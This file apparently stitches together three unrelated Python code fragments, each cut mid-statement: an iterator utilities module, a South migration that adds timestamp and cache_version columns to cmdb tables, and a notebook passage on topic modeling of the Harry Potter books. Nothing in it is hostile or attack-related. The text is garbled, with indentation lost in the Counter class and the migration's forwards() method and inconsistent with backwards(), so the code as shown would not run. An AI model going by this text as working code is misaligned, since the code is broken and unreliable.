        # NOTE: the FetchingQueue default is constructed even when the key
        # already exists (setdefault evaluates its argument eagerly).
        queue = self.queues.setdefault(key, FetchingQueue(self.__fetch__))
        queue.enqueue(item)
    def __find_queue__(self, key):
        "search for the queue indexed by key"
        try:
            while key not in self.queues:
                self.__fetch__()
            return self.queues[key]
        except StopIteration:
            # Source exhausted without ever producing `key`.
            raise KeyError(key)
    def get_first_n_queues(self, n):
        """
        Run through the sequence until n queues are created and return
        them. If fewer are created, return those plus empty iterables to
        compensate.
        """
        try:
            while len(self.queues) < n:
                self.__fetch__()
        except StopIteration:
            pass
        values = list(self.queues.values())
        missing = n - len(values)
        values.extend(iter([]) for n in range(missing))
        return values
class FetchingQueue(queue.Queue):
    """
    A FIFO queue backed by a fetcher callable: whenever the queue is empty
    and another item is requested, the fetcher is invoked until it enqueues
    something (or raises StopIteration, ending iteration).
    >>> values = iter(range(10))
    >>> get_value = lambda: globals()['q'].enqueue(next(values))
    >>> q = FetchingQueue(get_value)
    >>> [x for x in q] == list(range(10))
    True
    Note that tuple(q) or list(q) would not have worked above because
    tuple(q) just copies the elements in the list (of which there are
    none).
    """
    def __init__(self, fetcher):
        super().__init__()
        # Called (possibly repeatedly) to refill the queue on demand.
        self._fetcher = fetcher
    def __next__(self):
        # Serve from the queue if possible; otherwise ask the fetcher for
        # more. Any StopIteration raised by the fetcher propagates.
        while True:
            if not self.empty():
                return self.get()
            self._fetcher()
    def __iter__(self):
        try:
            while True:
                yield next(self)
        except StopIteration:
            return
    def enqueue(self, item):
        # Non-blocking put; the fetcher uses this to supply items.
        self.put_nowait(item)
class Count:
    """
    A stop object that will count how many times it's been called and return
    False on the N+1st call. Useful for use with takewhile.
    >>> tuple(itertools.takewhile(Count(5), range(20)))
    (0, 1, 2, 3, 4)
    >>> print('catch', Count(5))
    catch at most 5
    It's possible to construct a Count with no limit or infinite limit.
    >>> unl_c = Count(None)
    >>> inf_c = Count(float('Inf'))
    Unlimited or limited by infinity are equivalent.
    >>> unl_c == inf_c
    True
    >>> print(unl_c)
    all
    An unlimited counter is useful for wrapping an iterable to get the
    count after it's consumed.
    >>> tuple(itertools.takewhile(unl_c, range(20)))[-3:]
    (17, 18, 19)
    >>> unl_c.count
    20
    If all you need is the count of items, consider :class:`Counter` instead.
    """
    def __init__(self, limit):
        self.count = 0
        # None means unlimited; normalize to +inf so comparisons work.
        self.limit = limit if limit is not None else float('Inf')
    def __call__(self, arg):
        # Raise if called again after the limit was already exceeded.
        if self.count > self.limit:
            raise ValueError("Should not call count stop more anymore.")
        self.count += 1
        return self.count <= self.limit
    def __str__(self):
        # BUG FIX: '%d' % float('Inf') raises OverflowError, so str() used
        # to crash for unlimited/infinite counters; report those as 'all'.
        if self.limit and not math.isinf(self.limit):
            return 'at most %d' % self.limit
        return 'all'
    def __eq__(self, other):
        # Equal when both count and limit match. (No __hash__ is defined,
        # so instances are unhashable — unchanged from the original.)
        return vars(self) == vars(other)
class islice:
    """May be applied to an iterable to limit the number of items returned.
    Works similarly to count, except is called only once on an iterable.
    Functionality is identical to islice, except for __str__ and reusability.
    >>> tuple(islice(5).apply(range(20)))
    (0, 1, 2, 3, 4)
    >>> tuple(islice(None).apply(range(20)))
    (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19)
    >>> print(islice(3, 10))
    items 3 to 9
    >>> print(islice(3, 10, 2))
    every 2nd item from 3 to 9
    """
    def __init__(self, *sliceArgs):
        self.sliceArgs = sliceArgs
    def apply(self, i):
        """Return an iterator over *i* limited by the stored slice args."""
        return itertools.islice(i, *self.sliceArgs)
    def __str__(self):
        return 'all' if self.sliceArgs == (None,) else self._formatArgs()
    def _formatArgs(self):
        def describe_span(bounds):
            # Inclusive human-readable span, e.g. (3, 10) -> '3 to 9'.
            return '%d to %d' % (bounds[0], bounds[1] - 1)
        n_args = len(self.sliceArgs)
        if n_args == 1:
            return 'at most %d' % self.sliceArgs
        if n_args == 2:
            return 'items %s' % describe_span(self.sliceArgs)
        if n_args == 3:
            ordinal = inflect.engine().ordinal(self.sliceArgs[2])
            span = describe_span(self.sliceArgs[0:2])
            return 'every %s item from %s' % (ordinal, span)
class LessThanNBlanks:
    """
    Callable that keeps returning True until it has seen n falsy elements.
    Can be used with filter or itertools.ifilter, for example:
    >>> import itertools
    >>> sampleData = ['string 1', 'string 2', '', 'string 3', '',
    ... 'string 4', '', '', 'string 5']
    >>> first = itertools.takewhile(LessThanNBlanks(2), sampleData)
    >>> tuple(first)
    ('string 1', 'string 2', '', 'string 3')
    >>> first = itertools.takewhile(LessThanNBlanks(3), sampleData)
    >>> tuple(first)
    ('string 1', 'string 2', '', 'string 3', '', 'string 4')
    """
    def __init__(self, nBlanks):
        self.limit = nBlanks
        self.count = 0
    def __call__(self, arg):
        if not arg:
            self.count += 1
        # Calling again after the limit was reached is an error.
        if self.count > self.limit:
            raise ValueError("Should not call this object anymore.")
        return self.count < self.limit
class LessThanNConsecutiveBlanks:
    """
    Callable that keeps returning True until n consecutive falsy elements
    have been seen.
    Can be used with filter or itertools.ifilter, for example:
    >>> import itertools
    >>> sampleData = ['string 1', 'string 2', '', 'string 3', '', 'string 4',
    ... '', '', 'string 5']
    >>> first = itertools.takewhile(LessThanNConsecutiveBlanks(2), sampleData)
    >>> tuple(first)
    ('string 1', 'string 2', '', 'string 3', '', 'string 4', '')
    """
    def __init__(self, nBlanks):
        self.limit = nBlanks
        self.count = 0
        # Truthiness of the most recently seen element.
        self.last = False
    def __call__(self, arg):
        if arg:
            # A truthy element resets the consecutive-blank counter.
            self.count = 0
        else:
            self.count += 1
        self.last = bool(arg)
        # Calling again after the limit was reached is an error.
        if self.count > self.limit:
            raise ValueError("Should not call this object anymore.")
        return self.count < self.limit
class splitter:
    """
    Object that splits a string on the given separator, one call at a time,
    yielding the pieces lazily.
    >>> s = splitter(',')
    >>> list(s('hello, world, this is your, master calling'))
    ['hello', ' world', ' this is your', ' master calling']
    """
    def __init__(self, sep=None):
        self.sep = sep
    def __call__(self, s):
        pos = 0
        while True:
            found = s.find(self.sep, pos)
            if found == -1:
                # No more separators: yield the tail and stop.
                yield s[pos:]
                return
            yield s[pos:found]
            pos = found + 1
def grouper_nofill_str(n, iterable):
    """
    Break *iterable* into chunks of size *n*; the final chunk may be
    smaller. Works like grouper_nofill, except chunks of a string are
    rejoined into strings.
    >>> tuple(grouper_nofill_str(3, 'foobarbaz'))
    ('foo', 'bar', 'baz')
    You can still use it on non-strings too if you like.
    >>> tuple(grouper_nofill_str(42, []))
    ()
    >>> tuple(grouper_nofill_str(3, list(range(10))))
    ([0, 1, 2], [3, 4, 5], [6, 7, 8], [9])
    """
    chunks = more_itertools.chunked(iterable, n)
    if isinstance(iterable, str):
        return (''.join(chunk) for chunk in chunks)
    return chunks
infinite_call = more_itertools.repeatfunc
def infiniteCall(f, *args):
    """Deprecated alias for :func:`infinite_call`.

    Binds *args* via functools.partial and delegates.
    """
    # Use a proper DeprecationWarning (the bare warn() emitted a UserWarning)
    # and point the warning at the caller's line rather than this one.
    warnings.warn("Use infinite_call", DeprecationWarning, stacklevel=2)
    return infinite_call(functools.partial(f, *args))
class Counter:
"""
Wrap an iterable in an object that stores the count of items
that pass through it.
>>> items = Counter(range(20))
>>> items.count
0
>>> values = list(items)
>>> items.count
20
"""
def | |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'CIValueFloat.created'
db.add_column('cmdb_civaluefloat', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueFloat.modified'
db.add_column('cmdb_civaluefloat', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueFloat.cache_version'
db.add_column('cmdb_civaluefloat', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIContentTypePrefix.created'
db.add_column('cmdb_cicontenttypeprefix', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIContentTypePrefix.modified'
db.add_column('cmdb_cicontenttypeprefix', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIContentTypePrefix.cache_version'
db.add_column('cmdb_cicontenttypeprefix', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIValueChoice.created'
db.add_column('cmdb_civaluechoice', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueChoice.modified'
db.add_column('cmdb_civaluechoice', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueChoice.cache_version'
db.add_column('cmdb_civaluechoice', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIValueString.created'
db.add_column('cmdb_civaluestring', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueString.modified'
db.add_column('cmdb_civaluestring', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueString.cache_version'
db.add_column('cmdb_civaluestring', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CI.created'
db.add_column('cmdb_ci', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CI.modified'
db.add_column('cmdb_ci', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CI.cache_version'
db.add_column('cmdb_ci', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIChangeGit.created'
db.add_column('cmdb_cichangegit', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChangeGit.modified'
db.add_column('cmdb_cichangegit', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChangeGit.cache_version'
db.add_column('cmdb_cichangegit', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'PuppetResourceStatus.created'
db.add_column('cmdb_puppetresourcestatus', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'PuppetResourceStatus.modified'
db.add_column('cmdb_puppetresourcestatus', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'PuppetResourceStatus.cache_version'
db.add_column('cmdb_puppetresourcestatus', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'PuppetLog.created'
db.add_column('cmdb_puppetlog', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'PuppetLog.modified'
db.add_column('cmdb_puppetlog', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'PuppetLog.cache_version'
db.add_column('cmdb_puppetlog', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CILayer.created'
db.add_column('cmdb_cilayer', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CILayer.modified'
db.add_column('cmdb_cilayer', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CILayer.cache_version'
db.add_column('cmdb_cilayer', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIIncident.created'
db.add_column('cmdb_ciincident', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIIncident.modified'
db.add_column('cmdb_ciincident', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIIncident.cache_version'
db.add_column('cmdb_ciincident', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIValueDate.created'
db.add_column('cmdb_civaluedate', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueDate.modified'
db.add_column('cmdb_civaluedate', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueDate.cache_version'
db.add_column('cmdb_civaluedate', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIAttribute.created'
db.add_column('cmdb_ciattribute', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIAttribute.modified'
db.add_column('cmdb_ciattribute', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIAttribute.cache_version'
db.add_column('cmdb_ciattribute', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIChangeZabbixTrigger.created'
db.add_column('cmdb_cichangezabbixtrigger', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChangeZabbixTrigger.modified'
db.add_column('cmdb_cichangezabbixtrigger', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChangeZabbixTrigger.cache_version'
db.add_column('cmdb_cichangezabbixtrigger', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIProblem.created'
db.add_column('cmdb_ciproblem', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIProblem.modified'
db.add_column('cmdb_ciproblem', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIProblem.cache_version'
db.add_column('cmdb_ciproblem', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIChangeStatusOfficeIncident.created'
db.add_column('cmdb_cichangestatusofficeincident', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChangeStatusOfficeIncident.modified'
db.add_column('cmdb_cichangestatusofficeincident', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChangeStatusOfficeIncident.cache_version'
db.add_column('cmdb_cichangestatusofficeincident', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIChangePuppet.created'
db.add_column('cmdb_cichangepuppet', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChangePuppet.modified'
db.add_column('cmdb_cichangepuppet', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChangePuppet.cache_version'
db.add_column('cmdb_cichangepuppet', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIValueInteger.created'
db.add_column('cmdb_civalueinteger', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueInteger.modified'
db.add_column('cmdb_civalueinteger', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIValueInteger.cache_version'
db.add_column('cmdb_civalueinteger', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIRelation.created'
db.add_column('cmdb_cirelation', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIRelation.modified'
db.add_column('cmdb_cirelation', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIRelation.cache_version'
db.add_column('cmdb_cirelation', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIType.created'
db.add_column('cmdb_citype', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIType.modified'
db.add_column('cmdb_citype', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIType.cache_version'
db.add_column('cmdb_citype', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIAttributeValue.created'
db.add_column('cmdb_ciattributevalue', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIAttributeValue.modified'
db.add_column('cmdb_ciattributevalue', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIAttributeValue.cache_version'
db.add_column('cmdb_ciattributevalue', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'CIChange.created'
db.add_column('cmdb_cichange', 'created',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChange.modified'
db.add_column('cmdb_cichange', 'modified',
self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CIChange.cache_version'
db.add_column('cmdb_cichange', 'cache_version',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
def backwards(self, orm):
    """Reverse this migration: drop the audit columns added by forwards().

    Removes the 'created', 'modified' and 'cache_version' columns from every
    cmdb table that forwards() extended, in the same table order.
    """
    # Tables listed in the exact order the original migration processed them,
    # so the generated SQL sequence is unchanged.
    audited_tables = (
        'cmdb_civaluefloat',
        'cmdb_cicontenttypeprefix',
        'cmdb_civaluechoice',
        'cmdb_civaluestring',
        'cmdb_ci',
        'cmdb_cichangegit',
        'cmdb_puppetresourcestatus',
        'cmdb_puppetlog',
        'cmdb_cilayer',
        'cmdb_ciincident',
        'cmdb_civaluedate',
        'cmdb_ciattribute',
        'cmdb_cichangezabbixtrigger',
        'cmdb_ciproblem',
        'cmdb_cichangestatusofficeincident',
        'cmdb_cichangepuppet',
        'cmdb_civalueinteger',
        'cmdb_cirelation',
        'cmdb_citype',
        'cmdb_ciattributevalue',
        'cmdb_cichange',
    )
    # Per table: 'created', then 'modified', then 'cache_version' — the same
    # per-table column order as the original hand-unrolled version.
    for table in audited_tables:
        for column in ('created', 'modified', 'cache_version'):
            db.delete_column(table, column)
models = {
'cmdb.ci': {
'Meta': {'unique_together': "((u'content_type', u'object_id'),)", 'object_name': 'CI'},
'added_manually': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'barcode': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '255', 'unique': 'True', 'null': 'True'}),
'business_service': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'layers': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CILayer']", 'symmetrical': 'False'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'pci_scope': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'relations': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CI']", 'through': "orm['cmdb.CIRelation']", 'symmetrical': 'False'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '11'}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2', 'max_length': '11'}),
'technical_service': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIType']"}),
'uid': ('django.db.models.fields.CharField', [], {'max_length': '100', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'zabbix_id': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'})
},
'cmdb.ciattribute': {
'Meta': {'object_name': 'CIAttribute'},
'attribute_type': ('django.db.models.fields.IntegerField', [], {'max_length': '11'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'choices': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'ci_types': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['cmdb.CIType']", 'symmetrical': 'False'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'cmdb.ciattributevalue': {
'Meta': {'object_name': 'CIAttributeValue'},
'attribute': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIAttribute']"}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'ci': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CI']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'value_choice': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIValueChoice']", 'null': 'True', 'blank': 'True'}),
'value_date': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIValueDate']", 'null': 'True', 'blank': 'True'}),
'value_float': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIValueFloat']", 'null': 'True', 'blank': 'True'}),
'value_integer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIValueInteger']", 'null': 'True', 'blank': 'True'}),
'value_string': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CIValueString']", 'null': 'True', 'blank': 'True'})
},
'cmdb.cichange': {
'Meta': {'unique_together': "((u'content_type', u'object_id'),)", 'object_name': 'CIChange'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'ci': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cmdb.CI']", 'null': 'True', 'blank': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '1024'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'priority': ('django.db.models.fields.IntegerField', [], {'max_length': '11'}),
'time': ('django.db.models.fields.DateTimeField', [], {}),
'type': ('django.db.models.fields.IntegerField', [], {'max_length': '11'})
},
'cmdb.cichangegit': {
'Meta': {'object_name': 'CIChangeGit'},
'author': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'changeset': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'comment': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'file_paths': | |
= re.compile(r"0\.[0-9]{3}\*")
# Strip the "0.xxx*" probability weights from each topic string and keep the
# bare terms, producing (topic_number, [term, ...]) pairs for every LDA topic.
# NOTE(review): relies on `topic_sep` (compiled just above this chunk) and on
# `model` / `num_topics` defined earlier in the notebook.
model_topics = [(topic_no, re.sub(topic_sep, '', model_topic).split(' + ')) for topic_no, model_topic in
model.print_topics(num_topics=num_topics, num_words=5)]
descriptors = []  # short human-readable label per topic, used later as column names
for i, m in model_topics:
    # gensim numbers topics from 0; print them 1-indexed with their top 5 terms.
    print(i+1, ", ".join(m[:5]))
    # Label each topic by its two strongest terms, with quote marks stripped.
    descriptors.append(", ".join(m[:2]).replace('"', ''))
# #### 2.5.2- DYNAMIC TOPIC MODELING -- LdaSeqModel
# <a id="dynamic"></a>
# In[41]:
'''Analyzing the changes of three topics btetween the two halves of Harry Potter 1 and the two halves of Harry Potter 7
'''
# Tokens for Book 1 and Book 7 together, in document order.
# HP 1 contributes 6647 rows of tokens, HP 7 contributes 14971 (21618 total).
toklist_17 = corpustot.loc[corpustot['Book'].isin(['Harry Potter 1','Harry Potter 7'])]['Tokens'].to_list()
# As before, promote frequent word pairs to bigram tokens.
phrases_17 = Phrases(toklist_17)
bigram_17 = Phraser(phrases_17)
bigrams_17 = list(bigram_17[toklist_17])
print(len(bigrams_17))
# In[42]:
# Build the bag-of-words corpus and a dictionary restricted to mid-frequency
# terms (present in >=100 documents but in less than 10% of them).
sent_big_17 = pd.Series(bigrams_17)
dictionary_big_17 = Dictionary(sent_big_17)
dictionary_big_17.filter_extremes(no_below=100, no_above=0.1)
print(dictionary_big_17, flush=True)
ldacorpus_17 = [dictionary_big_17.doc2bow(text) for text in sent_big_17]
tfidfmodel_17 = TfidfModel(ldacorpus_17)
# BUGFIX: apply the TF-IDF model fitted on THIS corpus (tfidfmodel_17), not the
# earlier `tfidfmodel`, which was trained on a different dictionary whose term
# ids do not match ldacorpus_17 (and left tfidfmodel_17 unused).
model_corpus_17 = tfidfmodel_17[ldacorpus_17]
print(sent_big_17[0])
print(ldacorpus_17[0])
print(model_corpus_17[0])
# Four time slices, by document count:
#   slice 0: first half of Book 1, slice 1: second half of Book 1,
#   slice 2: first half of Book 7, slice 3: second half of Book 7.
time_slice = [3323,3324,7485,7486]
# Run the LDA Seq model that allows tracking the dynamics of the topics.
ldaseq = ldaseqmodel.LdaSeqModel(corpus=ldacorpus_17,
                                 id2word=dictionary_big_17,
                                 time_slice=time_slice,
                                 num_topics=3)
# In[43]:
# Topic-term distributions at time slice 0 (first half of Book 1, per the
# time_slice definition above).
ldaseq.print_topics(time=0)
# In[44]:
# NOTE(review): the original comment said slice 1 "corresponds to book7", but
# time_slice = [3323, 3324, 7485, 7486] makes slice 1 the SECOND half of Book 1.
ldaseq.print_topics(time=1)
# In[45]:
#ldaseq.print_topic_times(topic=0) # Evolution of 1st topic along the four time slots
ldaseq.print_topic_times(topic=1) # Evolution of 2nd topic along the four time slots
#ldaseq.print_topic_times(topic=2) # Evolution of 3rd topic along the four time slots
# Slight changes are visible across the periods: the relative weight of some
# terms shifts, particularly between the first two slices (Book 1) and the
# last two slices (Book 7).
# In[46]:
doc = ldaseq.doc_topics(500) # Topic mixture of a single document (= sentence)
# Index 500 falls inside Book 1's 6647 token rows.
print(doc)
# In[47]:
doc = ldaseq.doc_topics(7000) # Topic mixture of another document
# NOTE(review): the original comment said this "belongs to Book1", but index
# 7000 lies beyond Book 1's 6647 rows, so this document is from Book 7.
print (doc)
# ### 2.6- MATRIX FACTORIZATION
# <a id="matrix"></a>
# In[48]:
# NMF FACTORIZATION
# Input: one raw string per instance (sentence) across all seven books.
documents = corpustot['Instances'].to_list()
# Unigrams + bigrams; drop terms in <0.1% or >75% of documents.
tfidf_vectorizer = TfidfVectorizer(analyzer='word', ngram_range=(1,2), min_df=0.001, max_df=0.75, stop_words='english', sublinear_tf=True)
X = tfidf_vectorizer.fit_transform(documents)
# BUGFIX: removed a bare `tfidf_vectorizer.get_feature_names()` call whose
# return value was discarded mid-cell (dead code); the vocabulary is fetched
# where it is actually used, in cell In[51].
print(X.shape)
# In[49]:
k = 10  # number of latent components (topics) for the factorizations below
nmf = NMF(n_components=k, init='nndsvd', random_state=0)
get_ipython().run_line_magic('time', 'W = nmf.fit_transform(X)')
H = nmf.components_  # component x term matrix
print(W.shape, H.shape)
# In[50]:
def show_topics(A, vocabulary, topn=5):
    """Return one comma-separated string of the top-`topn` words per row of A.

    Each row of A is a latent dimension (topic) whose columns index into
    `vocabulary`; words are listed from strongest to weakest weight.
    """
    labels = []
    for row in A:
        strongest = np.argsort(row)[::-1][:topn]
        labels.append(', '.join(vocabulary[idx] for idx in strongest))
    return labels
# In[51]:
terms = tfidf_vectorizer.get_feature_names()  # vocabulary, index-aligned with columns of X
sorted(show_topics(H, terms))  # NMF topics; bare expression shown as notebook cell output
# In[52]:
# SVD MATRIX FACTORIZATION (truncated SVD / LSA): X ~ U * S * V
svd = TruncatedSVD(n_components=k)
get_ipython().run_line_magic('time', 'U = svd.fit_transform(X)')
S = svd.singular_values_
V = svd.components_  # component x term matrix
print(U.shape, S.shape, V.shape)
